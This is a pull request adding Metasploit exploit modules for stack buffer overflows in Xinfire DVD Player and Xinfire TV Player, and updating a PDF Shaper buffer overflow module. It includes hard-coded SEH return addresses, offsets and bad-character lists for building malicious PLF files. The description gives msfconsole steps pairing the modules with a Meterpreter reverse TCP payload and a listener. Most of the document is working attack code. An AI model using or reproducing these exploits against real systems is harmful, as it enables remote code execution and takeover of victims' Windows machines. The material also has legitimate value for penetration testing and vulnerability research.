### PR TITLE
Added 2 exploit module exploit/windows/fileformat/

### DIFF
--- a/modules/exploits/windows/fileformat/shaper_pdf_bof.rb
+++ b/modules/exploits/windows/fileformat/shaper_pdf_bof.rb
@@ -14,10 +14,9 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'            => 'PDF Shaper Buffer Overflow',
       'Description'     => %q{
-          PDF Shaper is prone to a security vulnerability when processing PDF files.
-        The vulnerability appears when we use Convert PDF to Image and use a specially
-        crafted PDF file. This module has been tested successfully on Win XP, Win 7,
-        Win 8, Win 10.
+        PDF Shaper is prone to a security vulnerability when processing PDF files.
+        The vulnerability appears when we use Convert PDF to Image or PDF To PDF and use a specially
+        crafted PDF file. This module has been tested successfully on Win 7, Win 10.
       },
       'License'         => MSF_LICENSE,
       'Author'          =>
@@ -41,9 +40,9 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'Targets'         =>
         [
-          ['<Win Xp, Win 7, Win 8, Win 10 / PDF Shaper v.3.5 and v.3.6>',
+          ['< Win 7, Win 10 / PDF Shaper Free, Premium and Profesional v.9.9 >',
            {
-             'Ret' => 0x00402AC1, # PDFTools.exe
+             'Ret' => 0x00402B19, # PDFTools.exe
              'Offset' => 433
            }
           ]

--- a/modules/exploits/windows/fileformat/xinfire_dvd_player.rb
+++ b/modules/exploits/windows/fileformat/xinfire_dvd_player.rb
@@ -19,8 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'metacom', # Vulnerability discovery  # metacom27@gmail.com - twitter.@m3tac0m
-          'metacom' # MSF Module
+          'metacom', # MSF Module and Vulnerability discovery  # metacom27@gmail.com
         ],
       'References'     =>
         [
@@ -34,6 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'Payload'        =>
         {
+	  'Space'    => 1000,
           'BadChars' => "\x00\x0a\x0d\x1a\x20",
           'DisableNops' => true,
         },
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     buffer = rand_text(target['Offset'])  #junk
     buffer << generate_seh_record(target.ret)
-    buffer << payload.encoded  # bytes of space
+    buffer << payload.encoded  # 1000 bytes of space
     # more junk may be needed to trigger the exception
 
     file_create(buffer)

--- a/modules/exploits/windows/fileformat/xinfire_dvd_player.rb
+++ b/modules/exploits/windows/fileformat/xinfire_dvd_player.rb
@@ -11,21 +11,22 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Xinfire DVD Player Buffer Overflow v5.5.0.0',
+      'Name'           => 'Xinfire DVD Player Buffer Overflow',
       'Description'    => %q{
-		This module exploits a stack-based buffer overflow on Xinfire DVD Player Pro and Standard.The vulnerability is triggered when opening 
-		a malicious PLF file on Playlist.Tested successfully on Win7, Win10.This software is similar as DVD X Player and BlazeDVD.
+          This module exploits a buffer overflow in Xinfire DVD Player Pro and Standard v5.5.0.0.When
+        the application is used to import a specially crafted plf file, a buffer overflow occurs
+        allowing arbitrary code execution.Tested successfully on Win7, Win10.This software is similar as DVD X Player and BlazeDVD.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'metacom', # MSF Module and Vulnerability discovery  # metacom27@gmail.com
+          'metacom' # MSF Module and Vulnerability discovery
         ],
       'References'     =>
         [
-          [ 'OSVDB', '<insert OSVDB number here>'],
-          [ 'EDB', 'insert CVE number here'],
-          [ 'EDB', '<insert another link to the exploit/advisory here>']
+          [ 'OSVDB', '' ],
+          [ 'EDB', '' ],
+          [ 'EDB', '' ]
         ],
       'DefaultOptions' =>
         {
@@ -33,9 +34,9 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'Payload'        =>
         {
-	  'Space'    => 1000,
-          'BadChars' => "\x00\x0a\x0d\x1a\x20",
           'DisableNops' => true,
+          'BadChars' => "\x00\x0a\x0d\x1a\x20",
+          'Space' => 1000,
         },
       'Platform' => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/fileformat/xinfire_dvd_player.rb
+++ b/modules/exploits/windows/fileformat/xinfire_dvd_player.rb
@@ -1,0 +1,66 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Xinfire DVD Player Buffer Overflow v5.5.0.0',
+      'Description'    => %q{
+		This module exploits a stack-based buffer overflow on Xinfire DVD Player Pro and Standard.The vulnerability is triggered when opening 
+		a malicious PLF file on Playlist.Tested successfully on Win7, Win10.This software is similar as DVD X Player and BlazeDVD.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'metacom', # Vulnerability discovery  # metacom27@gmail.com - twitter.@m3tac0m
+          'metacom' # MSF Module
+        ],
+      'References'     =>
+        [
+          [ 'OSVDB', '<insert OSVDB number here>'],
+          [ 'EDB', 'insert CVE number here'],
+          [ 'EDB', '<insert another link to the exploit/advisory here>']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process',
+        },
+      'Payload'        =>
+        {
+          'BadChars' => "\x00\x0a\x0d\x1a\x20",
+          'DisableNops' => true,
+        },
+      'Platform' => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows Universal', { 'Ret' => 0x6160174F, 'Offset' => 608 } ],	# p/p/r EPG.dll
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Apr 15 2020',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),
+      ])
+
+  end
+
+  def exploit
+
+    buffer = rand_text(target['Offset'])  #junk
+    buffer << generate_seh_record(target.ret)
+    buffer << payload.encoded  # bytes of space
+    # more junk may be needed to trigger the exception
+
+    file_create(buffer)
+
+  end
+end

--- a/modules/exploits/windows/fileformat/xinfire_tv_player.rb
+++ b/modules/exploits/windows/fileformat/xinfire_tv_player.rb
@@ -2,7 +2,6 @@
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
@@ -11,21 +10,23 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Xinfire TV Player Buffer Overflow v6.0.1.2 ',
+      'Name'           => 'Xinfire TV Player Buffer Overflow',
       'Description'    => %q{
-		This module exploits a stack-based buffer overflow on Xinfire TV Player Pro and Standard.The vulnerability is triggered when opening 
-		a malicious PLF file on Playlist.Tested successfully on Win7, Win10.This software is similar as Aviosoft Digital TV Player and BlazeVideo HDTV Player.
+          This module exploits a buffer overflow in Xinfire TV Player Pro and Standard v6.0.1.2.When
+        the application is used to import a specially crafted plf file, a buffer overflow occurs
+        allowing arbitrary code execution.Tested successfully on Win7, Win10.This software is similar as 
+        Aviosoft Digital TV Player and BlazeVideo HDTV Player.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'metacom', # MSF Module and Vulnerability discovery # metacom27@gmail.com
+          'metacom' # MSF Module and Vulnerability discovery 
         ],
       'References'     =>
         [
-          [ 'OSVDB', '<insert OSVDB number here>'],
-          [ 'EDB', 'insert CVE number here'],
-          [ 'EDB', '<insert another link to the exploit/advisory here>']
+          [ 'OSVDB', '' ],
+          [ 'EDB', '' ],
+          [ 'EDB', '' ]
         ],
       'DefaultOptions' =>
         {
@@ -33,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'Payload'        =>
         {
-	  'Space' => 1384,
+          'Space'    => 1384,
           'BadChars' => "\x00\x0a\x0d\x1a\x2f\x3a\x5c",
           'DisableNops' => true,
         },

--- a/modules/exploits/windows/fileformat/xinfire_tv_player.rb
+++ b/modules/exploits/windows/fileformat/xinfire_tv_player.rb
@@ -19,8 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'metacom', # Vulnerability discovery # metacom27@gmail.com - twitter.@m3tac0m
-          'metacom' # MSF Module
+          'metacom', # MSF Module and Vulnerability discovery # metacom27@gmail.com
         ],
       'References'     =>
         [
@@ -34,6 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'Payload'        =>
         {
+	  'Space' => 1384,
           'BadChars' => "\x00\x0a\x0d\x1a\x2f\x3a\x5c",
           'DisableNops' => true,
         },

--- a/modules/exploits/windows/fileformat/xinfire_tv_player.rb
+++ b/modules/exploits/windows/fileformat/xinfire_tv_player.rb
@@ -1,0 +1,66 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Xinfire TV Player Buffer Overflow v6.0.1.2 ',
+      'Description'    => %q{
+		This module exploits a stack-based buffer overflow on Xinfire TV Player Pro and Standard.The vulnerability is triggered when opening 
+		a malicious PLF file on Playlist.Tested successfully on Win7, Win10.This software is similar as Aviosoft Digital TV Player and BlazeVideo HDTV Player.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'metacom', # Vulnerability discovery # metacom27@gmail.com - twitter.@m3tac0m
+          'metacom' # MSF Module
+        ],
+      'References'     =>
+        [
+          [ 'OSVDB', '<insert OSVDB number here>'],
+          [ 'EDB', 'insert CVE number here'],
+          [ 'EDB', '<insert another link to the exploit/advisory here>']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process',
+        },
+      'Payload'        =>
+        {
+          'BadChars' => "\x00\x0a\x0d\x1a\x2f\x3a\x5c",
+          'DisableNops' => true,
+        },
+      'Platform' => 'win',
+      'Targets'  =>
+        [	
+          [ 'Windows Universal', { 'Ret' => 0x613018E9, 'Offset' => 608 } ],	# p/p/r DTVDeviceManager.dll
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Apr 16 2020',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),
+      ])
+
+  end
+
+  def exploit
+
+    buffer = rand_text(target['Offset'])  #junk
+    buffer << generate_seh_record(target.ret)
+    buffer << payload.encoded  #1384 bytes of space
+    # more junk may be needed to trigger the exception
+
+    file_create(buffer)
+
+  end
+end


### PR DESCRIPTION
Vulnerable Application
open plf file on (playlist), and the vulnerability is triggered.

Targets
Win 7 and Win 10

Verification

use exploit/windows/fileformat/xinfire_dvd_player
set payload windows/meterpreter/reverse_tcp
set lhost (IP of Local Host)
exploit

use exploit/windows/fileformat/xinfire_tv_player
set payload windows/meterpreter/reverse_tcp
set lhost (IP of Local Host)
exploit

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (IP of Local Host)
exploit

Video demo Buffer Overflow Xinfire DVD Player
https://youtu.be/IqTO7WNJO24

Video demo Buffer Overflow Xinfire TV Player Pro
https://youtu.be/ivBPLheOWy4

downloads software
https://download.cnet.com/Xinfire-TV-Player-Pro/3000-13632_4-75986988.html
https://download.cnet.com/Xinfire-DVD-Player-Professional/3000-13632_4-75984423.html


Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

